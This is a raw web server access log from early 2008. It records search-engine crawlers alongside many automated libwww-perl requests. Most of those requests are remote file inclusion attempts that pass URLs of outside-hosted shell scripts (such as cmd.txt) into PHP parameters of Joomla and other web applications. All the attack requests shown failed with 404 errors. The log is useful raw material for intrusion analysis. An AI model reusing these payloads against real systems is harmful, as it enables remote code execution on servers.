125.162.87.96 - - [10/Jan/2008:05:27:17 -0800] "GET /logs/access_071109.log HTTP/1.0" 200 29983 "http://www.google.co.id/search?hl=id&q=filetype%3Alog+admin&btnG=Telusuri&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
125.162.87.96 - - [10/Jan/2008:05:27:25 -0800] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
125.162.87.96 - - [10/Jan/2008:05:27:25 -0800] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
74.6.24.212 - - [10/Jan/2008:05:28:08 -0800] "GET /?N=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
125.162.87.96 - - [10/Jan/2008:05:29:31 -0800] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
74.6.26.118 - - [10/Jan/2008:05:30:35 -0800] "GET /funny/ HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.132.63 - - [10/Jan/2008:05:31:11 -0800] "GET /errors.php?error=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.162.87.96 - - [10/Jan/2008:05:32:43 -0800] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
89.44.41.49 - - [10/Jan/2008:05:33:35 -0800] "GET /logs/access_071123.log HTTP/1.1" 200 53071 "-" "hwqtifsocpmiobWydiodwq" "www.dmulk.com"
207.44.132.63 - - [10/Jan/2008:05:34:13 -0800] "GET /components/com_artlinks/errors.php?error=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.231.2 - - [10/Jan/2008:05:34:28 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.231.2 - - [10/Jan/2008:05:34:29 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.44.41.49 - - [10/Jan/2008:05:34:33 -0800] "GET /logs/access_071111.log HTTP/1.1" 200 72697 "-" "acp9L9c9xehciuinleelntcpmuloa9ppne" "www.dmulk.com"
218.51.233.233 - - [10/Jan/2008:05:34:40 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:05:39:47 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:05:39:47 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.98.115 - - [10/Jan/2008:05:39:47 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.grupomlucas.es/modules/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.132.63 - - [10/Jan/2008:05:39:56 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.135.219.10 - - [10/Jan/2008:05:40:17 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )" "www.dmulk.com"
61.135.219.10 - - [10/Jan/2008:05:40:20 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:05:41:08 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:05:41:08 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:05:41:08 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [10/Jan/2008:05:46:36 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
66.249.70.241 - - [10/Jan/2008:05:46:43 -0800] "GET /megumi/earrings/10_Venetian_Red_Blue_15.JPG HTTP/1.1" 200 582712 "-" "Googlebot-Image/1.0" "www.dmulk.com"
68.142.212.185 - - [10/Jan/2008:05:46:55 -0800] "GET /minamijewelry/html/images/wind_character.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
207.44.132.63 - - [10/Jan/2008:05:47:46 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.131.209.130 - - [10/Jan/2008:05:49:31 -0800] "GET /logs/gore.php?libpath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.131.209.130 - - [10/Jan/2008:05:49:32 -0800] "GET /gore.php?libpath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.8.71 - - [10/Jan/2008:05:51:58 -0800] "GET /warboard/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:52:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:52:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.110 - - [10/Jan/2008:05:53:18 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.107 - - [10/Jan/2008:05:53:18 -0800] "GET /funny/?N=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:05:53:27 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:05:53:27 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:05:53:27 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:05:53:27 -0800] "GET /modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:05:53:27 -0800] "GET /modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:05:53:28 -0800] "GET /modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:05:53:28 -0800] "GET /logs/modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:05:53:28 -0800] "GET /logs/modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:05:53:28 -0800] "GET /logs/modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:54:30 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:54:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:54:31 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:54:33 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:54:33 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:54:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:54:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:54:34 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:54:34 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:54:34 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:54:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:54:34 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:54:35 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:54:36 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:54:36 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:54:36 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:54:36 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:54:36 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:55:12 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:55:12 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.81 - - [10/Jan/2008:05:55:42 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
137.195.36.29 - - [10/Jan/2008:05:55:55 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.195.36.29 - - [10/Jan/2008:05:55:56 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.195.36.29 - - [10/Jan/2008:05:55:59 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:05:57:27 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:05:57:27 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:05:57:27 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:57:51 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:57:51 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:57:51 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:58:03 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:58:03 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:58:03 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:05:58:03 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:58:03 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:05:58:03 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:05:59:56 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:05:59:57 -0800] "GET /modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:05:59:57 -0800] "GET /logs/modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:06:00:10 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:06:00:11 -0800] "GET /modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:06:00:11 -0800] "GET /logs/modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:06:00:19 -0800] "GET /logs/modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:06:01:03 -0800] "GET /modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [10/Jan/2008:06:01:04 -0800] "GET /logs/modifyform.html?code=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.140.114 - - [10/Jan/2008:06:02:49 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/sc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:04:40 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:04:40 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:04:41 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:04:47 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:04:47 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:04:47 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:04:50 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:04:50 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:04:50 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:07:15 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:07:19 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:07:24 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.26.35 - - [10/Jan/2008:06:07:48 -0800] "GET /bikes/dteel/10MAR07/?M=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:06:08:45 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:06:08:45 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.128.186 - - [10/Jan/2008:06:08:45 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.195.36.29 - - [10/Jan/2008:06:09:04 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.195.36.29 - - [10/Jan/2008:06:09:04 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.195.36.29 - - [10/Jan/2008:06:09:08 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:09:39 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:09:39 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:09:39 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:09:51 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:09:51 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:09:51 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:10:02 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:10:02 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:10:02 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:11:10 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:11:25 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.88.117.203 - - [10/Jan/2008:06:11:44 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.99.83 - - [10/Jan/2008:06:12:36 -0800] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.5.54.68 - - [10/Jan/2008:06:15:00 -0800] "GET /logs/access_071203.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mysunsethouse-lombok.com/images/.../.../klenk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
